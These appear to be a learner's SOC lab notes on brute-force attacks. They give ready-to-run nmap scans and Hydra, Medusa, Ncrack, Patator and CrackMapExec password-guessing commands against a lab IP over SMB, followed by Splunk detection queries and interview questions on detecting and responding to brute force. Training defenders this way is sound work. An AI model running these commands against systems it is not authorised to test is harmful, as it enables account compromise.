NOTE # WHAT SOC ANALYSTS ACTUALLY Look for 
SOC teams dont care which tool the attacker used. 
They watch for patterns like : 

Indicator                         Meaning 
Many failed login attempts        possible brute force 
Same IP trying many passwords      Credential attack 
Multiple accounts targeted        password spraying 
Login success after failures      Account Compromise 

LOGS SOC ANALYST LOOK AT 
The most important SOC skill is LOG investigation 
for windows environments the key events are 

4625 - Failed login attempt 
4624 - Successful login 
4672 - Admin privileges assigned

Common Ports that are attacked on Brute force are 
-22 (SSH) - secure remote shell (Linux Servers)
-21(FTP) - File Transfer Service (FTP server Logs) 
-23(Telnet) -Old remote login protocol (Telnet server Logs) 
-3389(RDP) - Windows Remote Desktop (Windows login Events)
-3306(MYSQL) - Database Server(My SQL authentication logs) 
 -5432(Postgresql) - Database server (PostgreSQL logs) 
-5900(VNC) -Remote desktop service (VNC Logs)
-80/443(Web login forms) - Web servers (Web server access logs) 

Step 1. 
Ping with the Endpoint Ip adrress if everything is connected 

step 2 
Check what ports are open 
nmap Ip address (Only shows the 1000 ports that are open) 
nmap -p- Ip address (scans all 65000 ports )
nmap -p 135,139,445,3389,5985,80,443, 192.168.95.131 (This will scan particular ports that are stated here with Endpoint IP at last) 

Step 3 
Install BruteForce tool It can be 
1.Hydra (supports SSH, FTP, RDP, HTTP Login Forms, SMB)  
2. Medusa 
3. CrackMapExec (Very common in Active Directory Attacks ) 
4. Ncrack(can brute force RDP.SSH,FTP, SMB)
5.Patator(Supports HTTP, SSH, FTP, RDP)

Attack cmd for each tools 
(CRACKMAPEXEC TOOLS)
3. Crackmap Exec - first u need to create a nano passwords.txt and type several passwords or passwords that u want to guess and run the below command 
crackmapexec smb 192.168.95.131 -u Administrator -p passwords.txt 
Now go to the SPlunk Enterprise and Search this SPL 
index=wineventlog EventCode=4625

1.(HYDRA) Bruteforce Attack 
Even fro Hydra create the nano passowrds.txt 
hydra -l administrator -P passwords.txt smb://192.168.95.131

2.(Medusa)
Make sure the medusa is installed if not 
sudo apt install medusa 
create passwords list i:e nano passwords.txt
medusa -h 192.168.95.131 -u administrator -P passwords.txt -M smbnt 
Meaning :
-h-- target host 
-u---username 
-P---password list 
-M smbnt ---SMB module 

4.Ncrack
ncrack --version 
install ncrack if not installed 
sudo apt install ncrack 
ncrack -p 445 -u administrator -p passwords.txt 192.168.95.131
meaning i:e 
-p 445---SMB port 
-u---username 
-P----password List 

5. Patator(more advanced ) 
install - sudo apt install patator 
patator smb_login host=192.168.95.131 user=administrator password=FILE0 0=passwords.txt
meaning i:e 
host -- target machine 
user -- username 
File0 = password list 


NOTE# A brute force attack involves repeated authentication attempts to guess a password. In a windows 
machine i would look for Event ID 4625 for failed logins and check the source IP, targeted account and 
frequency of attempts. I would determine whether a successful login occured afterward and then 
investigate the scope of the activity to see if the attacker moved to other Systems.

#Interview Questions
What is a brute-force attack?

Good answer

A brute-force attack is when an attacker repeatedly tries multiple password combinations to gain unauthorized access to an account or service.

Example pattern:

login attempt → fail
login attempt → fail
login attempt → fail
login attempt → success

SOC analysts detect this by monitoring repeated authentication failures.

2️⃣ How would you detect a brute-force attack?

SOC analysts look for patterns like:

• many failed login attempts
• same IP trying multiple passwords
• repeated attempts in short time
• successful login after many failures

Example detection query in Splunk:

index=* EventCode=4625
| stats count by Source_Network_Address Account_Name
3️⃣ Which logs would you investigate for brute-force activity?

For Windows systems:

Event ID	Meaning
4625	Failed login attempt
4624	Successful login
4672	Admin privileges assigned

SOC analysts look for many 4625 events from the same IP.

4️⃣ What is the difference between brute force and password spraying?
Attack Type	Behavior
Brute force	many passwords against one account
Password spraying	one password against many accounts

Example:

Brute force:

admin → password1
admin → password2
admin → password3

Password spraying:

password123 → admin
password123 → john
password123 → guest
5️⃣ What is credential stuffing?

Credential stuffing is when attackers use stolen username/password pairs from previous data breaches to attempt login on other services.

Example:

email + password from breached database

SOC detection:

• many login attempts across accounts
• login from unusual locations

6️⃣ What indicators suggest a brute-force attack?

Indicators include:

• high number of login failures
• login attempts from unfamiliar IP addresses
• multiple attempts within short time
• authentication attempts across many systems

7️⃣ What actions should a SOC analyst take after detecting brute force?

Typical response steps:

lock or disable the affected account

block the attacking IP address

enforce password reset

enable MFA if not enabled

investigate further activity

8️⃣ How can organizations prevent brute-force attacks?

Common security controls:

• multi-factor authentication (MFA)
• account lockout policies
• strong password policies
• rate limiting login attempts
• monitoring authentication logs

9️⃣ What MITRE ATT&CK technique represents brute force?

Brute force is mapped as:

T1110 – Brute Force

SOC teams often map alerts to MITRE techniques.

🔟 What would you investigate after a successful brute-force login?

SOC analysts check:

• what actions the user performed after login
• whether new accounts were created
• if sensitive files were accessed
• if lateral movement occurred

This determines the impact of the compromise.

How Your Lab Helps With These Questions

Your lab already simulated:

• brute force with CrackMapExec
• Hydra attacks
• Medusa attacks
• Ncrack attacks
• Patator attacks

In real SOC work, analysts don’t care about the tool — they look at authentication patterns in logs, which you are already practicing in Splunk.

Next Attack to Practice (Very Important)

The next attack you should simulate is:

Password Spraying

Why?

Because it is one of the most common attacks in real corporate environments, and SOC analysts must distinguish it from brute force.

Example pattern:

password123 → admin
password123 → john
password123 → guest

This looks very different in Splunk logs.


























